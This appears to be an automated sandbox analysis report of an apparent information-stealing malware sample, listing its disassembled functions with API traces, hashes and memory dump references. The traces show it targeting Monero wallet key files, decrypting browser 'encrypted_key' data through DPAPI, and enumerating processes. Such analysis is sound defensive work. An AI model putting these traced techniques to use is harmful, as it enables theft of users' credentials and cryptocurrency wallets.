                  • API String ID: 769748085-2783943728
                  • Opcode ID: 3c3b1dd03e3ea7ec1e150a698e66982fd761af5a3bcc44a51ab3b9472dc17f2c
                  • Instruction ID: d880893fca0aec46f3ce3f8fc5294dadc319f24a0ee006df4b952ccda47e8dc3
                  • Opcode Fuzzy Hash: 3c3b1dd03e3ea7ec1e150a698e66982fd761af5a3bcc44a51ab3b9472dc17f2c
                  • Instruction Fuzzy Hash: 5AE0E675A50208BFD714DB94DD09E5977B8FB44702F114154FD0A97280D9B16E109F56
                  Function 0062A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0062A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0062A6BC
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0062A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5ff4eaf036a879b510ffd5a048124e18f709dc711d62d1d8197a0bfd0f4ad3d6
                  • Instruction ID: 3afe9c588bc2aec9a9e7571d9021f4f3ad3aa771223c3b225b1f8c112ab8d5a9
                  • Opcode Fuzzy Hash: 5ff4eaf036a879b510ffd5a048124e18f709dc711d62d1d8197a0bfd0f4ad3d6
                  • Instruction Fuzzy Hash: B5E12072810108ABCB48FBE4DC92EEE733AAF14300F51815DF55776091EF706A49DBAA
                  Function 0062D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062D481
                  • lstrlen.KERNEL32(00000000), ref: 0062D698
                  • lstrlen.KERNEL32(00000000), ref: 0062D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0062D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 786e5c7702a348f1902154c0862b0f5795ecb7f858fb8204db61552b3ca34f50
                  • Instruction ID: 7101fc1ed2142a4933c0c249307c86f42ee3a5166f42f7852813d3a27246530d
                  • Opcode Fuzzy Hash: 786e5c7702a348f1902154c0862b0f5795ecb7f858fb8204db61552b3ca34f50
                  • Instruction Fuzzy Hash: 4D910372810108AADB44FBE0DD96EEE733AAF14300F51416CF54776091EF746A09DBEA
                  Function 0062D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062D801
                  • lstrlen.KERNEL32(00000000), ref: 0062D99F
                  • lstrlen.KERNEL32(00000000), ref: 0062D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0062DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 4f6994530ecab0df4bac6805bfc127ab4c34b2654fe738838d8c9f6c5df0ccff
                  • Instruction ID: d17450f8f2945bf86e2cda8574f04677d679a41a434dd0e9453fee1db5793689
                  • Opcode Fuzzy Hash: 4f6994530ecab0df4bac6805bfc127ab4c34b2654fe738838d8c9f6c5df0ccff
                  • Instruction Fuzzy Hash: 1181F172910118AADB44FBE0DC96EEE733ABF14300F51412CF546B6191EF746A09EBE6
                  Function 006370D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                  Download Yara Rule
                  Strings
                  • sc, xrefs: 006372AE, 00637179, 0063717C
                  • sc, xrefs: 00637111
                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0063718C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy
                  • String ID: sc$sc$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                  • API String ID: 3722407311-90809162
                  • Opcode ID: 184041814eaceeda6a535c753091de55f43789b87a1918ce8c44324c70f66018
                  • Instruction ID: 211135bf4b1e39dd681be9b8649bacdc069c7f8f3569a40e84f73b4f80efff58
                  • Opcode Fuzzy Hash: 184041814eaceeda6a535c753091de55f43789b87a1918ce8c44324c70f66018
                  • Instruction Fuzzy Hash: 6C517CB1C04219AFDB64EB90DC95BEEB376AF44304F1440ACE61577281EB746E88DF98
                  Function 00633560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 5dcc6f1dc39ae122c5036426fd0ff493a87d21c904455d3f6902c96295f15f3c
                  • Instruction ID: 8e74b98c91c7e124d4ef3117284a44e2fe8cd7b26cc1d7c22dc67889067173ec
                  • Opcode Fuzzy Hash: 5dcc6f1dc39ae122c5036426fd0ff493a87d21c904455d3f6902c96295f15f3c
                  • Instruction Fuzzy Hash: 2C414FB5D10119AFDB04EFE4D886AEEB776AB44304F008418F51277391DB74AA09DFE5
                  Function 00629CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00629D39
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629AEF
                    • Part of subcall function 00629AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00624EEE,00000000,?), ref: 00629B01
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629B2A
                    • Part of subcall function 00629AC0: LocalFree.KERNEL32(?,?,?,?,00624EEE,00000000,?), ref: 00629B3F
                    • Part of subcall function 00629B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00629B84
                    • Part of subcall function 00629B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00629BA3
                    • Part of subcall function 00629B60: LocalFree.KERNEL32(?), ref: 00629BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: b077be8e05a7d7e77dde83d755c2e87fb4542f0ddbe4b707530689d09fb0d477
                  • Instruction ID: 379cae387d7249451346ba62e767fdc6d252106b7e77d9b72a2d934b1d20fae9
                  • Opcode Fuzzy Hash: b077be8e05a7d7e77dde83d755c2e87fb4542f0ddbe4b707530689d09fb0d477
                  • Instruction Fuzzy Hash: FC3150B5D00619ABCF04DBE4DC85BEFB7BAAF88300F144518E901A7241E7309A44CBA5
                  Function 00638680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006405B7), ref: 006386CA
                  • Process32First.KERNEL32(?,00000128), ref: 006386DE
                  • Process32Next.KERNEL32(?,00000128), ref: 006386F3
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • CloseHandle.KERNEL32(?), ref: 00638761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 46d5be12793157f14937bd7c95c77fbd845522a0451731889064be0d54697027
                  • Instruction ID: 6e96bb3c30ae5c6793f5e6338dbbc2ec29d500cfcc98ae863915edcc5d3772f3
                  • Opcode Fuzzy Hash: 46d5be12793157f14937bd7c95c77fbd845522a0451731889064be0d54697027
                  • Instruction Fuzzy Hash: A9313971901218ABCB68DF94DC85FEEB77AFB45700F1041A9F50AA22A0DB706A45CFE1
                  Function 00637980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00640E00,00000000,?), ref: 006379B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 006379B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00640E00,00000000,?), ref: 006379C4
                  • wsprintfA.USER32 ref: 006379F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 272c53418e5d72c7a04979fed0a7df0e7cf3358ba916ab00d0602f91b77f5f12
                  • Instruction ID: debc01a4a955f313af9f0a9a66f9714b58545ec06347be2aedda30e37a39996d
                  • Opcode Fuzzy Hash: 272c53418e5d72c7a04979fed0a7df0e7cf3358ba916ab00d0602f91b77f5f12
                  • Instruction Fuzzy Hash: 6E11F7B2904118ABCB18DFD9DD45BBEB7F8FB4CB11F11425AF605A2280E6795940CBB1
                  Function 0063C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 0063C74E
                    • Part of subcall function 0063BF9F: __amsg_exit.LIBCMT ref: 0063BFAF
                  • __getptd.LIBCMT ref: 0063C765
                  • __amsg_exit.LIBCMT ref: 0063C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0063C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 8042fcf350f566052d202cefd46b382687e1b15489caf565bfd67f01ec594e6a
